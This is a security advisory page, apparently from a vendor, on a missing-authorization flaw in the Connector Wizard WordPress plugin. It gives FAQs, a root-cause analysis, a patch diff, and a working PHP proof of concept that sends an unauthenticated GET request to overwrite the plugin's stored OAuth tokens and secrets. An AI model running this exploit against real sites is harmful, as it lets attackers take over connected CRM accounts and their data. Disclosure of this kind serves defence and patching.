What is CVE-2025-68026?

CVE-2025-68026 is a medium-severity vulnerability in the Connector Wizard plugin for WordPress. It allows unauthenticated attackers to update plugin settings due to a missing capability check, potentially compromising sensitive credentials.

How does this vulnerability work?

The vulnerability allows attackers to send a crafted HTTP GET request to the WordPress site, which can update critical plugin options without authentication. This is possible because the vulnerable function does not verify user capabilities or nonce validation.

Who is affected by CVE-2025-68026?

All installations of the Connector Wizard plugin version 2.1.1 and earlier are affected. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.

How can I check if my site is vulnerable?

Log in to your WordPress admin panel, navigate to the ‘Plugins’ section, and locate the Connector Wizard plugin. If the version is 2.1.1 or earlier, your site is vulnerable and requires immediate attention.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Connector Wizard plugin to version 2.1.2 or later. This version includes security checks that prevent unauthorized access to plugin settings.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Connector Wizard plugin until a patch can be applied. This will prevent exploitation until the vulnerability is resolved.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability, suggesting that while it poses a risk, the potential impact may not be as critical as higher-scoring vulnerabilities. However, it still requires prompt attention.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can lead to unauthorized access to sensitive OAuth credentials, potentially allowing attackers to take over connected CRM accounts and disrupt automated workflows, leading to data exfiltration.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can send a crafted GET request to the vulnerable plugin endpoint with specific parameters to overwrite sensitive settings. This highlights the ease of exploitation due to the lack of authentication checks.

How can I protect my WordPress site from similar vulnerabilities?

Regularly update all plugins and themes, use security plugins to monitor vulnerabilities, and implement web application firewalls. Additionally, conduct periodic security audits to identify and address potential weaknesses.

Are there any known exploits for CVE-2025-68026?

As of now, there have been no widespread reports of active exploitation of CVE-2025-68026. However, given the nature of the vulnerability, it is advisable to take preventive measures immediately.

Where can I find more information on CVE-2025-68026?

Detailed information about CVE-2025-68026 can be found on the National Vulnerability Database (NVD) and through security advisories from WordPress and security research organizations like Atomic Edge.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-68026: LC Wizard <= 2.1.1 – Missing Authorization to Unauthenticated Settings Update (ghl-wizard)

CVE ID CVE-2025-68026

Plugin ghl-wizard

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 2.1.1

Patched Version 2.1.2

Disclosed February 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68026:
This vulnerability is a Missing Authorization flaw in the Connector Wizard (formerly LC Wizard) WordPress plugin, affecting all versions up to and including 2.1.1. The vulnerability allows unauthenticated attackers to update critical plugin configuration settings, including authentication tokens and client secrets, via a publicly accessible callback handler. The CVSS score of 5.3 reflects the moderate impact on confidentiality and integrity.

Atomic Edge research identifies the root cause in the `ghl-wizard/inc/utility.php` file, specifically within the anonymous function attached to the `init` action (lines 4-35 in the vulnerable version). The function processes GET parameters (`get_auth`, `lid`, `atn`, `rtn`, `cid`, `cst`) to update plugin options without performing any capability checks. The code executes `update_option()` calls for sensitive credentials and redirects users to the admin panel, but it lacks both authentication verification and nonce validation.

Exploitation requires an attacker to craft a single HTTP GET request to any page on the WordPress site. The request must include specific parameters that trigger the vulnerable callback. The attack vector is `GET /?get_auth=success&lid=[location_id]&atn=[access_token]&rtn=[refresh_token]&cid=[client_id]&cst=[client_secret]`. No authentication, session cookies, or nonce tokens are required. An attacker can send this request directly or trick an administrator into visiting a malicious link.

The patch in version 2.1.2 introduces three security checks before processing the parameters. First, it verifies the presence of required GET parameters (`cwa_connection_key`, `get_auth`, `lid`). Second, it validates a nonce using `wp_verify_nonce()` against the `connector-wizard-app-connect-nonce` action. Third, it performs a capability check with `current_user_can(‘manage_options’)`, restricting access to administrators. The patch also modifies the `lcw_get_authorize_url()` function (line 664) to generate and include the required nonce in the redirect URL.

Successful exploitation allows an attacker to overwrite the plugin’s stored OAuth credentials (`hlwpw_access_token`, `hlwpw_refresh_token`, `hlwpw_client_id`, `hlwpw_client_secret`) and location ID (`hlwpw_locationId`). This could lead to account takeover of the connected HighLevel/LeadConnector CRM integration, disruption of automated workflows, and potential data exfiltration from the CRM platform. Attackers could redirect data flows to systems they control.

Differential between vulnerable and patched code

Code Diff

--- a/ghl-wizard/ghl-wizard.php
+++ b/ghl-wizard/ghl-wizard.php
@@ -4,7 +4,7 @@
  * Plugin Name:       Connector Wizard (formerly LC Wizard)
  * Plugin URI:        https://betterwizard.com/lead-connector-wizard/
  * Description:       Connect WordPress with the popular LeadConnector CRM(HighLevel) and combine the power of automation and excellent user experience. Including memberships, content protection, WooCommerce automation, custom fields & many more...
- * Version:           2.1.1
+ * Version:           2.1.2
  * Author:            Better Wizard
  * Author URI:        https://connectorwizard.app/
  * Requires PHP:      7.4
--- a/ghl-wizard/inc/utility.php
+++ b/ghl-wizard/inc/utility.php
@@ -4,35 +4,45 @@
     @ v: 1.2.18
 ***********************************/
 add_action('init', function() {
-    if ( isset( $_GET['get_auth'] ) && $_GET['get_auth'] == 'success' && isset( $_GET['lid'] ) ) {
-        $hlwpw_access_token 	= sanitize_text_field( $_GET['atn'] );
-        $hlwpw_refresh_token 	= sanitize_text_field( $_GET['rtn'] );
-        $hlwpw_locationId 		= sanitize_text_field( $_GET['lid'] );
-        $hlwpw_client_id 		= sanitize_text_field( $_GET['cid'] );
-        $hlwpw_client_secret 	= sanitize_text_field( $_GET['cst'] );
-
-        // Save data
-        update_option( 'hlwpw_access_token', $hlwpw_access_token );
-        update_option( 'hlwpw_refresh_token', $hlwpw_refresh_token );
-        update_option( 'hlwpw_locationId', $hlwpw_locationId );
-        update_option( 'hlwpw_client_id', $hlwpw_client_id );
-        update_option( 'hlwpw_client_secret', $hlwpw_client_secret );
-        update_option( 'hlwpw_location_connected', 1 );
-
-        // delete old transient (if exists any)
-        delete_transient('hlwpw_location_tags');
-        delete_transient('hlwpw_location_campaigns');
-        delete_transient('hlwpw_location_wokflow');
-        delete_transient('hlwpw_location_custom_values');
-        delete_transient('lcw_location_cutom_fields');
+    if ( empty( $_GET['cwa_connection_key'] ) || empty( $_GET['get_auth'] ) || empty( $_GET['lid'] ) ) {
+        return;
+    }

-        wp_redirect(admin_url('admin.php?page=connector-wizard-app'));
-        exit();
+    if ( ! wp_verify_nonce( $_GET['cwa_connection_key'], 'connector-wizard-app-connect-nonce' ) ) {
+        return;
+    }

-        // Need to update on Database
-        // on next version
+    if ( ! current_user_can( 'manage_options' ) ) {
+        return;
     }
-});
+
+    $hlwpw_access_token 	= sanitize_text_field( $_GET['atn'] );
+    $hlwpw_refresh_token 	= sanitize_text_field( $_GET['rtn'] );
+    $hlwpw_locationId 		= sanitize_text_field( $_GET['lid'] );
+    $hlwpw_client_id 		= sanitize_text_field( $_GET['cid'] );
+    $hlwpw_client_secret 	= sanitize_text_field( $_GET['cst'] );
+
+    // Save data
+    update_option( 'hlwpw_access_token', $hlwpw_access_token );
+    update_option( 'hlwpw_refresh_token', $hlwpw_refresh_token );
+    update_option( 'hlwpw_locationId', $hlwpw_locationId );
+    update_option( 'hlwpw_client_id', $hlwpw_client_id );
+    update_option( 'hlwpw_client_secret', $hlwpw_client_secret );
+    update_option( 'hlwpw_location_connected', 1 );
+
+    // delete old transient (if exists any)
+    delete_transient('hlwpw_location_tags');
+    delete_transient('hlwpw_location_campaigns');
+    delete_transient('hlwpw_location_wokflow');
+    delete_transient('hlwpw_location_custom_values');
+    delete_transient('lcw_location_cutom_fields');
+
+    wp_redirect(admin_url('admin.php?page=connector-wizard-app'));
+    exit();
+
+    // Need to update on Database
+    // on next version
+} );

 /***********************************
     AJAX handler for password reset
@@ -654,7 +664,13 @@
     return add_query_arg( [
         'get_code'      => 1,
         'parcel'        => lcw_get_encrypted_parcel(),
-        'redirect_page' => admin_url( 'admin.php?page=connector-wizard-app' ),
+        'redirect_page' => urlencode( add_query_arg(
+        [
+                'page'               => 'connector-wizard-app',
+                'cwa_connection_key' => wp_create_nonce( 'connector-wizard-app-connect-nonce' )
+            ],
+            admin_url( 'admin.php' )
+        ) ),
     ], 'https://betterwizard.com/lc-wizard' );
 }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68026 - LC Wizard <= 2.1.1 - Missing Authorization to Unauthenticated Settings Update

<?php

$target_url = 'http://vulnerable-wordpress-site.local/';

// Arbitrary values an attacker would inject to compromise the plugin's connection
$payload = [
    'get_auth' => 'success',
    'lid'      => 'attacker_controlled_location_id',
    'atn'      => 'attacker_access_token',
    'rtn'      => 'attacker_refresh_token',
    'cid'      => 'attacker_client_id',
    'cst'      => 'attacker_client_secret'
];

$ch = curl_init();

// Construct the attack URL
$attack_url = $target_url . '?' . http_build_query($payload);
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); // Do not follow the admin redirect

// Execute the attack
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check for successful exploitation
if ($http_code >= 300 && $http_code < 400) {
    echo "[+] Exploit likely successful. The plugin settings were updated.n";
    echo "    HTTP Status: $http_code (Redirect to admin panel expected)n";
} else {
    echo "[-] Exploit may have failed or the site is not vulnerable.n";
    echo "    HTTP Status: $http_coden";
}

?>

Frequently Asked Questions

What is CVE-2025-68026?
Overview of the vulnerability
CVE-2025-68026 is a medium-severity vulnerability in the Connector Wizard plugin for WordPress. It allows unauthenticated attackers to update plugin settings due to a missing capability check, potentially compromising sensitive credentials.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send a crafted HTTP GET request to the WordPress site, which can update critical plugin options without authentication. This is possible because the vulnerable function does not verify user capabilities or nonce validation.
Who is affected by CVE-2025-68026?
Identifying vulnerable installations
All installations of the Connector Wizard plugin version 2.1.1 and earlier are affected. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.
How can I check if my site is vulnerable?
Steps to verify plugin version
Log in to your WordPress admin panel, navigate to the ‘Plugins’ section, and locate the Connector Wizard plugin. If the version is 2.1.1 or earlier, your site is vulnerable and requires immediate attention.
How can I fix this vulnerability?
Updating the plugin
To mitigate this vulnerability, update the Connector Wizard plugin to version 2.1.2 or later. This version includes security checks that prevent unauthorized access to plugin settings.
What if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the Connector Wizard plugin until a patch can be applied. This will prevent exploitation until the vulnerability is resolved.
What does the CVSS score of 5.3 indicate?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity vulnerability, suggesting that while it poses a risk, the potential impact may not be as critical as higher-scoring vulnerabilities. However, it still requires prompt attention.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
If exploited, this vulnerability can lead to unauthorized access to sensitive OAuth credentials, potentially allowing attackers to take over connected CRM accounts and disrupt automated workflows, leading to data exfiltration.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept demonstrates how an attacker can send a crafted GET request to the vulnerable plugin endpoint with specific parameters to overwrite sensitive settings. This highlights the ease of exploitation due to the lack of authentication checks.
How can I protect my WordPress site from similar vulnerabilities?
Best practices for WordPress security
Regularly update all plugins and themes, use security plugins to monitor vulnerabilities, and implement web application firewalls. Additionally, conduct periodic security audits to identify and address potential weaknesses.
Are there any known exploits for CVE-2025-68026?
Current state of exploitation
As of now, there have been no widespread reports of active exploitation of CVE-2025-68026. However, given the nature of the vulnerability, it is advisable to take preventive measures immediately.
Where can I find more information on CVE-2025-68026?
Resources for further research
Detailed information about CVE-2025-68026 can be found on the National Vulnerability Database (NVD) and through security advisories from WordPress and security research organizations like Atomic Edge.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations